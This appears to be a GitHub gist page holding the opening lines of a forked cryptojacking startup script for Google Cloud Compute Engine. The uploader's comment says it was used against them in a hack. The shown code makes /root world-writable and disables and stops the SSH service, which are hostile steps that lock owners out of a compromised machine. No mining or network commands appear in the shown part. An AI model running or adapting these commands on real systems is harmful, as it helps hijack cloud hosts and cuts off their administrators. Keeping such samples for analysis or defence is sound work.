Skip to content

Instantly share code, notes, and snippets.

View OfficiallyMelon's full-sized avatar

Melon OfficiallyMelon

View GitHub Profile
@OfficiallyMelon
OfficiallyMelon / startup_script.sh
Created July 24, 2022 23:28 — forked from dataslayermedia/startup_script.sh
Google Cloud Platform Cryptojacking Startup Script for Compute Engine Provisioning via API
# The only reason I have this script is because it was used against me in a hack...
if [ -f "/root/start.sh" ]; then
exit 0
fi
chmod 777 /root
systemctl disable ssh.service || true
systemctl stop ssh.service || true